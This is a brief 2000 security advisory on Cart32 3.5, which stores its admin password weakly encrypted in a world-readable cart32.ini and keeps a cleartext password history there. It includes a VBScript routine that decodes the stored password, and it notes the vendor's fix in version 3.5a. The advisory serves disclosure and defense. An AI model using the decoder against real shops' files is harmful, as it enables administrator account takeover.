Reported November 8, 2000 by Colin
Hart
VERSIONS AFFECTED
DESCRIPTION
Cart 32 version 3.5 creates a file cart32.ini which
contains, in encrypted form, the administration password. The
encryption scheme used is very weak and can be broken. In the debug
section of the file, you may also find a password history in clear
text. The cart32.ini file resides in a world readable directory by
default.
DEMONSTRATION
As requested by the vendor, Colin Hart
did not provide the encryption algorithm used by Cart32. However,
Xato Network Security, in their release of additional Cart32 problems also
released this VBScript that will demonstrate how the password could be
de-encrypted;
Cart32Decode = Chr(Asc(Mid(sPass, 8)) - 12) &
_
Chr(Asc(Mid(sPass, 5)) - 8) & _
Chr(Asc(Mid(sPass, 3)) - 16) & _
Chr(Asc(Mid(sPass, 15)) - 15) & _
Chr(Asc(Mid(sPass, 9)) - 9) & _
Chr(Asc(Mid(sPass, 1)) - 12) & _
Chr(Asc(Mid(sPass, 4)) - 3) & _
Chr(Asc(Mid(sPass, 11)) - 5) & _
Chr(Asc(Mid(sPass, 13)) - 11) & _
Chr(Asc(Mid(sPass, 6)) - 5) & _
Chr(Asc(Mid(sPass, 2)) - 1) & _
Chr(Asc(Mid(sPass, 2)) - 1) & _
Chr(Asc(Mid(sPass, 14)) - 13) & _
Chr(Asc(Mid(sPass, 12)) - 10) & _
Chr(Asc(Mid(sPass, 10)) - 6) & _
Chr(Asc(Mid(sPass, 7)) - 8)
VENDOR RESPONSE
The Cart 32 team at McMurtrey/Whitaker
& Associates has addressed these issues in the latest version 3.5a and
has recommended that users read the knowledge base articles provided on
their web site. http://www.cart32.com
CREDIT Discovered by Colin
Hart
|